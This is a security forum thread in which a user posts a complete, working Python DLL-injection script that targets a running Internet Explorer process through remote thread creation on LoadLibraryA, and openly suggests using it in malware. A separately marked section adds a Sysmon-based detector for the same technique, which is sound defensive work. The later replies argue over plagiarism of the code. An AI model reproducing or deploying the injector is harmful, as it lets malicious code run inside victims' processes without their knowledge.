
Author Topic: FERNSEC's Python DLL-Injector.  (Read 1537 times)

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
FERNSEC's Python DLL-Injector.
« on: August 18, 2015, 11:53:28 AM »
I've made a script that will attempt to inject a predefined DLL into the Internet Explorer process on Windows. One application could be in malware. This script assumes you have a DLL called mydll.dll in the same directory as the script (presumably where it was downloaded together with your evil executable, after you have compiled the script).

The formatting is a little unconventional because I had a 'print' after each operation in the script for testing purposes, which have since been removed, save for the final print, which, together with the last 'else', can be commented out for your convenience. Here's the code for the script:

Code:
from win32com.client import GetObject
from ctypes import *
from ctypes import wintypes
import ctypes, sys, os

Wmi = GetObject('winmgmts:')
# Get the IE process (first match if several iexplore.exe processes exist)
explorer = Wmi.ExecQuery('select * from Win32_Process where Name="iexplore.exe"')
if len(explorer) == 0:
    sys.exit("iexplore.exe is not running")
# Grab its Pid
PID = explorer[0].Properties_('ProcessId').Value

# Get DLL path. It must be absolute: LoadLibraryA runs inside the target and
# resolves a bare name against the target's search path, not this script's
file = 'mydll.dll'

path = os.path.dirname(os.path.abspath(__file__))
DLL_PATH = os.path.join(path, file)


# Define constants we use
PAGE_RW_PRIV = 0x04            # PAGE_READWRITE
PROCESS_ALL_ACCESS = 0x1F0FFF
VIRTUAL_MEM = 0x3000           # MEM_COMMIT | MEM_RESERVE

#CTYPES handler
kernel32 = windll.kernel32

# Declare prototypes: without restype/argtypes ctypes treats every handle and
# pointer as a 32-bit int, which silently breaks the script on 64-bit Python
kernel32.OpenProcess.restype = wintypes.HANDLE
kernel32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
kernel32.VirtualAllocEx.restype = wintypes.LPVOID
kernel32.VirtualAllocEx.argtypes = [wintypes.HANDLE, wintypes.LPVOID, c_size_t,
                                    wintypes.DWORD, wintypes.DWORD]
kernel32.WriteProcessMemory.restype = wintypes.BOOL
kernel32.WriteProcessMemory.argtypes = [wintypes.HANDLE, wintypes.LPVOID, wintypes.LPCVOID,
                                        c_size_t, POINTER(c_size_t)]
kernel32.GetModuleHandleA.restype = wintypes.HMODULE
kernel32.GetModuleHandleA.argtypes = [wintypes.LPCSTR]
kernel32.GetProcAddress.restype = wintypes.LPVOID
kernel32.GetProcAddress.argtypes = [wintypes.HMODULE, wintypes.LPCSTR]
kernel32.CreateRemoteThread.restype = wintypes.HANDLE
kernel32.CreateRemoteThread.argtypes = [wintypes.HANDLE, wintypes.LPVOID, c_size_t, wintypes.LPVOID,
                                        wintypes.LPVOID, wintypes.DWORD, POINTER(wintypes.DWORD)]
kernel32.CloseHandle.argtypes = [wintypes.HANDLE]

def dll_inject(PID, DLL_PATH):
    # LoadLibraryA expects an ANSI, NUL-terminated string; create_string_buffer
    # appends the NUL, so sizeof() is the exact number of bytes to copy
    dll_buf = create_string_buffer(DLL_PATH.encode('mbcs'))
    LEN_DLL = sizeof(dll_buf)
    hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, PID)

    if not hProcess:  # OpenProcess returns NULL on failure, never None
        sys.exit("OpenProcess failed: %s" % ctypes.WinError())

    # Reserve writable memory in the target for the path string
    DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess, None, LEN_DLL, VIRTUAL_MEM, PAGE_RW_PRIV)
    if not DLL_PATH_ADDR:
        sys.exit("VirtualAllocEx failed: %s" % ctypes.WinError())

    bytes_written = c_size_t(0)
    if not kernel32.WriteProcessMemory(hProcess, DLL_PATH_ADDR, dll_buf, LEN_DLL, byref(bytes_written)):
        sys.exit("WriteProcessMemory failed: %s" % ctypes.WinError())

    # kernel32.dll is mapped at the same base in every process of the same
    # bitness, so LoadLibraryA's address here is valid in the target as well.
    # The target must therefore match this interpreter (32- or 64-bit).
    kernel32DllHandler_addr = kernel32.GetModuleHandleA(b"kernel32.dll")
    LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr, b"LoadLibraryA")
    if not LoadLibraryA_func_addr:
        sys.exit("GetProcAddress failed: %s" % ctypes.WinError())

    thread_id = wintypes.DWORD(0)  # for our thread id
    # The new thread runs LoadLibraryA(DLL_PATH_ADDR) inside the target
    hThread = kernel32.CreateRemoteThread(hProcess, None, 0, LoadLibraryA_func_addr,
                                          DLL_PATH_ADDR, 0, byref(thread_id))
    if not hThread:
        sys.exit("CreateRemoteThread failed: %s" % ctypes.WinError())
    else:
        print("Remote Thread 0x%08x created, DLL code injected" % thread_id.value)

    kernel32.CloseHandle(hThread)
    kernel32.CloseHandle(hProcess)

dll_inject(PID, DLL_PATH)

Alternatively you can check the script out and download it via github by following this link.

https://github.com/FernSecurity/DLL-Injector

I've tested it on Windows 7, but it should be able to inject the DLL into any Win32 process.

Feel free to modify and/or improve the script; if you happen to do so, I'd love to see your work!
« Last Edit: August 18, 2015, 01:25:55 PM by FERNSEC »
"Words have no power to impress the mind without the exquisite horror of their reality"
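A detection-side counterpart to the script above, added here as an example and not part of FERNSEC's post or repository. The sequence OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread(LoadLibraryA, path) leaves a distinctive trace: a thread created in another process whose start address resolves to kernel32!LoadLibraryA or LoadLibraryW. Sysmon records cross-process thread creation as Event ID 8 with SourceImage, TargetImage, StartModule and StartFunction fields. The records below are constructed samples in that shape (paths, PIDs and addresses are made up), and the classifier flags both the LoadLibrary variant this script produces and the unbacked-start-address case (empty StartModule/StartFunction) that manual mapping or shellcode injection produces.

```python
"""Flag the LoadLibrary remote-thread injection pattern in Sysmon-style Event ID 8 records.

Added example, not part of the original post or the linked repository.
"""
import re

# Constructed sample records in the key=value style of Sysmon message text.
# Every PID, path and address here is made up.
SAMPLE_EVENTS = [
    "EventID=8 SourceImage=C:\\Users\\bob\\Downloads\\evil.exe SourceProcessId=4120 "
    "TargetImage=C:\\Program Files\\Internet Explorer\\iexplore.exe TargetProcessId=2216 "
    "StartAddress=0x76F0ACC0 StartModule=C:\\Windows\\System32\\kernel32.dll StartFunction=LoadLibraryA",
    "EventID=8 SourceImage=C:\\Windows\\System32\\csrss.exe SourceProcessId=552 "
    "TargetImage=C:\\Windows\\explorer.exe TargetProcessId=1840 "
    "StartAddress=0x77A1B2C0 StartModule=C:\\Windows\\System32\\ntdll.dll StartFunction=RtlUserThreadStart",
    "EventID=8 SourceImage=C:\\Temp\\stage2.exe SourceProcessId=9001 "
    "TargetImage=C:\\Windows\\System32\\svchost.exe TargetProcessId=760 "
    "StartAddress=0x000001F3C0A20000 StartModule= StartFunction=",
    "EventID=1 Image=C:\\Windows\\System32\\notepad.exe ProcessId=3344",
]

# A value runs until the next " Key=" token or end of line, so paths with
# spaces ("Program Files") survive; an empty value ("StartModule=") parses as ''.
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line):
    """Return one record as a dict of field name to string value."""
    return {k: v.strip() for k, v in KV_RE.findall(line)}


def classify(evt):
    """Verdict for an Event ID 8 record, or None for any other event type.

    loadlibrary_injection:  start function is LoadLibraryA/W in kernel32.dll,
                            i.e. a path was written into the target and a
                            thread was started on LoadLibrary (this script).
    unbacked_start_address: no module backs the start address, the shape of
                            shellcode or manually mapped code.
    benign:                 a remote thread with a normal module-backed start.
    """
    if evt.get("EventID") != "8":
        return None
    fn = evt.get("StartFunction", "")
    mod = evt.get("StartModule", "").lower()
    if fn in ("LoadLibraryA", "LoadLibraryW") and mod.endswith("kernel32.dll"):
        return "loadlibrary_injection"
    if mod == "" and fn == "":
        return "unbacked_start_address"
    return "benign"


def scan(lines):
    """Return (source_image, target_image, verdict) for every suspicious record."""
    hits = []
    for line in lines:
        evt = parse_event(line)
        verdict = classify(evt)
        if verdict in ("loadlibrary_injection", "unbacked_start_address"):
            hits.append((evt["SourceImage"], evt["TargetImage"], verdict))
    return hits


if __name__ == "__main__":
    for src, dst, why in scan(SAMPLE_EVENTS):
        print("%-45s -> %-50s %s" % (src, dst, why))
```

Run stand-alone it reports the evil.exe -> iexplore.exe LoadLibraryA thread and the stage2.exe -> svchost.exe unbacked thread and ignores the csrss.exe and process-creation records. In a real deployment you would feed it exported event-log lines instead of the embedded samples and suppress known sources that legitimately create remote threads (debuggers, some AV/EDR agents) by SourceImage, not by loosening the start-function check.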

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1710
  • Internets: +94/-0
  • My password is **********
Re: FERNSEC's Python DLL-Injector.
« Reply #1 on: August 18, 2015, 12:51:42 PM »

The formatting is a little unconventional because I had a 'print' after each operation in the script for testing purposes, which have since been removed.

That is a clever idea, FERNSEC. And quite practical when one is new and working with coding.
I will have to make sure to incorporate that if I ever get into coding/scripting.

Offline Vector
Re: FERNSEC's Python DLL-Injector.
« Reply #2 on: August 18, 2015, 01:13:10 PM »

The formatting is a little unconventional because I had a 'print' after each operation in the script for testing purposes, which have since been removed.

That is a clever idea, FERNSEC. And quite practical when one is new and working with coding.
I will have to make sure to incorporate that if I ever get into coding/scripting.

Yeah man, it's a simple debugging technique but quite useful.
"Words have no power to impress the mind without the exquisite horror of their reality"

Sam

  • Guest
Re: FERNSEC's Python DLL-Injector.
« Reply #3 on: August 19, 2015, 03:26:13 AM »
source:
https://github.com/santoshkumarsingh/python/blob/master/dllinjection.py
https://waitfordebug.wordpress.com/2012/02/07/dll-injection-in-python/
https://github.com/infodox/python-dll-injection/blob/master/get_pid.py
https://github.com/batistam/VMInjector/blob/master/vminjector/vminject.py
ad infinitum

Offline Vector
Re: FERNSEC's Python DLL-Injector.
« Reply #4 on: August 19, 2015, 09:15:42 AM »
source:
https://github.com/santoshkumarsingh/python/blob/master/dllinjection.py
https://waitfordebug.wordpress.com/2012/02/07/dll-injection-in-python/
https://github.com/infodox/python-dll-injection/blob/master/get_pid.py
https://github.com/batistam/VMInjector/blob/master/vminjector/vminject.py
ad infinitum

Your point being? If all you want is to point out how unoriginal a script of this sort is, feel free to not post in my thread at all.

If you already have something for this, cool; if not, here's my spin on it.
« Last Edit: August 19, 2015, 09:42:45 AM by FERNSEC »
"Words have no power to impress the mind without the exquisite horror of their reality"

Sam
Re: FERNSEC's Python DLL-Injector.
« Reply #5 on: August 19, 2015, 09:54:10 AM »
Point is that you did not write the code yourself.

Offline yashar26

  • Top Hat Member
  • Elite
  • ********
  • Posts: 584
  • Internets: +76/-2
  • Sec+, CEH v8, eCPPT Gold, eWAPT
Re: FERNSEC's Python DLL-Injector.
« Reply #6 on: August 19, 2015, 01:09:30 PM »
How awesome are you, FERNSEC... copy-paste someone else's code, change a line or two and call it your code... well done, we need more people like you in infosec.

Offline Vector
Re: FERNSEC's Python DLL-Injector.
« Reply #7 on: August 19, 2015, 04:02:37 PM »
How awesome are you, FERNSEC... copy-paste someone else's code, change a line or two and call it your code... well done, we need more people like you in infosec.

Are you trying to tell me you never used an example when you made something? Lol, sounds legit. I got some code, added what I needed, thought other people might find it useful, so I posted it here. Sorry for contributing to your dead forum.

Last time I checked, all the scripts that Sam linked to did not get the PID of the IE process or the DLL path on their own. I'm not saying this is a marvel of coding; all I'm saying is you can stop being a condescending asshole and accept content wherever it's provided to you.

Any more complaints can be sent to /dev/null.
« Last Edit: August 19, 2015, 04:31:39 PM by FERNSEC »
"Words have no power to impress the mind without the exquisite horror of their reality"

Sam
Re: FERNSEC's Python DLL-Injector.
« Reply #8 on: August 20, 2015, 12:40:32 AM »
... did not get the PID of the IE process or the DLL path on their own. ...

Yeah, but you just copy-pasted that from another person. Anyone can do that. This is not new content; it is just recycling. Good job.

Offline yashar26
Re: FERNSEC's Python DLL-Injector.
« Reply #9 on: August 20, 2015, 03:12:33 AM »
How awesome are you, FERNSEC... copy-paste someone else's code, change a line or two and call it your code... well done, we need more people like you in infosec.

Are you trying to tell me you never used an example when you made something? Lol, sounds legit. I got some code, added what I needed, thought other people might find it useful, so I posted it here. Sorry for contributing to your dead forum.

Last time I checked, all the scripts that Sam linked to did not get the PID of the IE process or the DLL path on their own. I'm not saying this is a marvel of coding; all I'm saying is you can stop being a condescending asshole and accept content wherever it's provided to you.

Any more complaints can be sent to /dev/null.

Yes, I am a condescending asshole... when I see people plagiarizing, it makes my blood boil. But really, it makes you look worse. There is no reason to insult me or other people. Next time you modify a few lines, at least quote where you found the original script.
I was tempted to ban you for insulting me, but I'll let the others see how much of an awesome person you are.

Offline GalaxyNinja
Re: FERNSEC's Python DLL-Injector.
« Reply #10 on: August 21, 2015, 02:47:32 PM »
Next time you modify a few lines, at least quote where you found the original script.

Yes, one should always give credit to the original coders.
FERNSEC, I am sure if you created a script and someone took it and added some things to improve it, you would like credit for the original script.
At least pretty much everyone I know would.  ;)